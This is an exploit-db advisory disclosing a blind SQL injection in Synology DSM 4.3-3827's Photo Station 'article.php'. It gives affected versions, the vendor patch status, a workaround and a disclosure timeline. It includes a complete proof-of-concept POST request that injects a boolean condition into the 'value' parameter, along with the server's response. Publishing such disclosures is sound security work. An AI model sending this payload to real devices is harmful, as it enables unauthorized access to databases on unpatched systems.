Synology DSM 4.3-3827 – ‘article.php’ Blind SQL Injection

  • 作者: Michael Wisniewski
    日期: 2014-03-14
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  • 来源:https://www.exploit-db.com/exploits/32274/
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    Title: Synology DSM Blind SQL Injection
    Version affected: <= 4.3-3827
    Vendor: Synology
    Discovered by: Michael Wisniewski
    Status: Patched
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    The file "/photo/include/blog/article.php" contains a Blind SQL
    Injection Vulnerability in the 'value' variable in the URL.
    
    The vendor was contacted approximately 2 weeks ago.They reviewed the
    information and determined that it is vulnerable and a patch has been
    released.The DSM5 official release contains this patch, which was
    released earlier this week.An update for DSM4.x will be released
    later this month to address this issue in the 4.x line.The vendor
    also stated that it will be fixed in the next Photo Station hotfix for
    the 4.x line.
    
    Work-around: If you don't use the blog, just rename the file.
    
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    POST /photo/include/blog/article.php HTTP/1.1
    Content-Length: 59
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: <ip>:80/ <http://10.0.1.15:80/>
    Cookie: PHPSESSID=<foo>; visit_day=<foo>
    Host: <foo>
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
    like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    list_type=label&value=1%20AND%203*2*1%3d6%20AND%20812%3d812
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    It responds with:
    
    All posts without a label
    Synology Blog
    2008-01-01 00:00:00 Published by:Synology Blog
    
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    Timeline:
    - 3/1/14: Contacted Vendor with Details of Vulnerability and Exploit.
    - 3/2/14: Vendor responded with 'they are investigating'.
    - 3/4/14: Vendor responded with it being fixed in DSM5 and DSM4.x (4.x
    patched later in the month)
    - 3/10/14: DSM5 Released
    - 3/10/14: Contacted Vendor Final Time to make sure it's OK to release the
    information.